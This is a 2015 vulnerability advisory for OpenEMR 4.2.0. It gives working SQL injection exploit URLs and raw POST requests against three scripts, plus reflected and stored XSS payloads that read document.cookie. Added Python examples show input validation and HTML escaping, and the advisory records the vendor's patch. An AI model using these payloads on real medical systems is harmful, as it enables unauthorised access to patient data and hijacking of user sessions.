Advisory: Multiple reflected/stored XSS and SQLi vulnerabilities in openEMR v.4.2.0
Advisory ID: SROEADV-2015-08
Author: Steffen Rösemann
Affected Software: openEMR v.4.2.0 (Release-date: 28th Dec 2014)
Vendor URL: http://www.open-emr.org
Vendor Status: patched
CVE-ID: to be assigned after release of advisory via OSS list
==========================
Vulnerability Description:
==========================
The electronic health records and medical practice management application
OpenEMR 4.2.0 suffers from multiple SQL injection and reflected/stored XSS
vulnerabilities.
==================
Technical Details:
==================
All vulnerabilities described below can only be exploited by an already
authenticated user.
=====================
SQL injection vulnerabilities
=====================
An SQL injection vulnerability can be found in the facility_admin.php file
and can be abused by an attacker via the fid parameter.
Exploit-Example:
http://{TARGET}/interface/usergroup/facility_admin.php?fid=3%27+and+1=2+union+select+1,user%28%29,3,4,version%28%29,database%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+
Another (blind) SQL injection vulnerability resides in
appt_encounter_report.php and can be abused by an attacker by modifying
the form_facility parameter in a POST request.
Exploit-Example:
POST /openemr-4.2.0/interface/reports/appt_encounter_report.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/openemr-4.2.0/interface/reports/appt_encounter_report.php
Cookie: OpenEMR=p30d0tu19a9r04tjgnuu1oqqq4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

form_facility=3%27+AND+substring(version(),1,1)=%275&form_from_date=2015-01-13&form_to_date=2015-01-13&form_refresh=true
The last (blind) SQL injection vulnerability resides in the
appointments_report.php file and can likewise be abused by an attacker by
crafting SQL statements in the form_facility parameter of a POST
request.
Exploit-Example:
POST /openemr-4.2.0/interface/reports/appointments_report.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/openemr-4.2.0/interface/reports/appointments_report.php
Cookie: OpenEMR=p30d0tu19a9r04tjgnuu1oqqq4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 199

form_facility=3%27+and+substring(version(),1,1)=%274&form_provider=&form_from_date=2015-01-13&form_to_date=2015-01-13&form_apptstatus=&form_apptcat=ALL&form_orderby=comment&patient=&form_refresh=true
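All three SQL injection issues above share one root cause: a parameter the script treats as an integer row id (fid, form_facility) is placed into the query without being checked. The following added example, written for this advisory and not taken from OpenEMR's code base, parses a captured request of the shape shown above, applies the strict integer check the affected scripts would need, and reports which id parameters carry a non-integer value. The sample requests are constructed (cookie replaced by a placeholder); the parameter list and payload are those published in the advisory.

```python
# Added example (not OpenEMR code): triage captured HTTP requests for the
# integer-id SQL injection pattern from the advisory (fid in
# facility_admin.php, form_facility in the two report scripts) and show
# the strict validation that would have rejected those values.
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the affected scripts use as integer row ids (from the advisory).
INT_ID_PARAMS = ("fid", "form_facility")

# Constructed sample: shape of the advisory's POST, session cookie replaced
# by a placeholder, body as published.
SAMPLE_POST = (
    "POST /openemr-4.2.0/interface/reports/appt_encounter_report.php HTTP/1.1\r\n"
    "Host: localhost\r\n"
    "Cookie: OpenEMR=SESSION-ID-PLACEHOLDER\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "form_facility=3%27+AND+substring(version(),1,1)=%275"
    "&form_from_date=2015-01-13&form_to_date=2015-01-13&form_refresh=true"
)

# Constructed benign request for comparison (a plain numeric fid).
SAMPLE_GET_OK = (
    "GET /openemr-4.2.0/interface/usergroup/facility_admin.php?fid=3 HTTP/1.1\r\n"
    "Host: localhost\r\n"
    "\r\n"
)


def parse_raw_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path and a merged dict of
    decoded query-string and form-body parameters ({name: [values]})."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, target, _ = head.splitlines()[0].split(" ", 2)
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    if body.strip():
        for name, values in parse_qs(body.strip(), keep_blank_values=True).items():
            params.setdefault(name, []).extend(values)
    return {"method": method, "path": parts.path, "params": params}


def validate_int_id(value: str) -> int:
    """Strict check a script should apply before using a row id in SQL:
    an optional sign and 1-10 digits, nothing else. The advisory's value
    ("3' AND substring(version(),1,1)='5") fails here before reaching MySQL."""
    if not re.fullmatch(r"-?[0-9]{1,10}", value):
        raise ValueError("id parameter is not an integer: %r" % value)
    return int(value)


def find_injected_int_params(parsed: dict) -> list:
    """Names of integer-id parameters in a parsed request whose value does
    not pass validate_int_id; an empty list means nothing suspicious."""
    flagged = []
    for name in INT_ID_PARAMS:
        for value in parsed["params"].get(name, []):
            try:
                validate_int_id(value)
            except ValueError:
                flagged.append(name)
                break
    return flagged


if __name__ == "__main__":
    for raw in (SAMPLE_POST, SAMPLE_GET_OK):
        req = parse_raw_request(raw)
        print(req["method"], req["path"], "->", find_injected_int_params(req) or "clean")
```

The check deliberately allows only digits rather than trying to recognise SQL keywords: a denylist would have to chase every spelling of AND, UNION or substring(), whereas a row id that is not an integer has no legitimate reason to reach the query at all. The same rule, applied server-side (cast to int, or bind the value as a parameter), is what closes all three injection points.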
==============
XSS vulnerabilities
==============
A reflected XSS vulnerability can be found in user_admin.php via the
id parameter.
Exploit-Example:
http://{TARGET}/interface/usergroup/user_admin.php?id=4%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
A stored XSS vulnerability resides in add_edit_event.php via the
input field "form_comments"; the stored payload is executed when
appointments_report.php renders it.
Exploit-Example:
<script>alert(document.cookie)</script>
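The two XSS issues sit in different output contexts: the id parameter is echoed inside an HTML attribute (the leading `">` in the payload closes that attribute and its tag), while the stored comment is printed as element content. The following added example, written for this advisory and not taken from OpenEMR's templates, renders each context first the vulnerable way (raw concatenation) and then with context-appropriate HTML escaping, and uses Python's own HTML parser to count how many <script> elements a browser would actually see in the result. The markup snippets are assumptions standing in for the real user_admin.php and appointments_report.php output; the payloads are the ones published above.

```python
# Added example (not OpenEMR code): vulnerable versus escaped rendering of
# the two output contexts named in the advisory, plus a parser-based check
# that counts <script> start tags in the produced HTML. The surrounding
# markup is assumed, not OpenEMR's real template output.
import html
from html.parser import HTMLParser

# Payloads as published in the advisory (decoded form of the id parameter,
# and the comment text entered in form_comments).
ID_PAYLOAD = '4"><script>alert(document.cookie)</script>'
COMMENT_PAYLOAD = "<script>alert(document.cookie)</script>"


def render_id_attr_vulnerable(user_id: str) -> str:
    """Attribute context: the id value echoed into a hidden form field.
    The '">' at the start of the payload terminates the attribute and tag."""
    return '<input type="hidden" name="id" value="' + user_id + '">'


def render_id_attr_hardened(user_id: str) -> str:
    """Same field with quote-aware escaping: '"' becomes &quot;, '<' becomes
    &lt;, so the value can no longer leave the attribute."""
    return ('<input type="hidden" name="id" value="'
            + html.escape(user_id, quote=True) + '">')


def render_comment_vulnerable(comment: str) -> str:
    """Element-body context: a stored comment listed in a report table."""
    return "<td>" + comment + "</td>"


def render_comment_hardened(comment: str) -> str:
    """Same cell with the comment escaped at output time."""
    return "<td>" + html.escape(comment, quote=True) + "</td>"


class ScriptTagCounter(HTMLParser):
    """Counts the <script> start tags a tokenizer finds in a fragment."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1


def count_script_tags(fragment: str) -> int:
    """0 means the payload survived only as inert text."""
    parser = ScriptTagCounter()
    parser.feed(fragment)
    parser.close()
    return parser.script_tags


if __name__ == "__main__":
    cases = (
        ("id attr, vulnerable", render_id_attr_vulnerable(ID_PAYLOAD)),
        ("id attr, hardened  ", render_id_attr_hardened(ID_PAYLOAD)),
        ("comment, vulnerable", render_comment_vulnerable(COMMENT_PAYLOAD)),
        ("comment, hardened  ", render_comment_hardened(COMMENT_PAYLOAD)),
    )
    for label, fragment in cases:
        print(label, "script tags:", count_script_tags(fragment), fragment)
```

Escaping has to happen at output time and match the context: html.escape with quote=True covers both the attribute and the element-body cases shown here, but it is not sufficient for values placed inside a JavaScript string or a URL, which need their own encoders. For the stored case, escaping on output rather than on input is what protects every page that later displays the comment, not just the one that received it.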
=========
Solution:
=========
Install the latest patch (released 21st March 2015, see [3]).
====================
Disclosure Timeline:
====================
12/13-Jan-2015 - found the vulnerabilities
13-Jan-2015 - informed the developers
13-Jan-2015 - release date of this security advisory [without technical
details]
13-Jan-2015 - vendor responded and announced a patch
20-Jan-2015 - vendor provided a fix for testing purposes
20-Jan-2015 - agreement to release technical details once the patch has been
released
21-Mar-2015 - release date of the patch
22-Mar-2015 - release date of this security advisory
22-Mar-2015 - sent to Full Disclosure
========
Credits:
========
Vulnerabilities found and advisory written by Steffen Rösemann.
===========
References:
===========
[1] http://www.open-emr.org
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-08.html
[3] http://www.open-emr.org/wiki/index.php/OpenEMR_Patches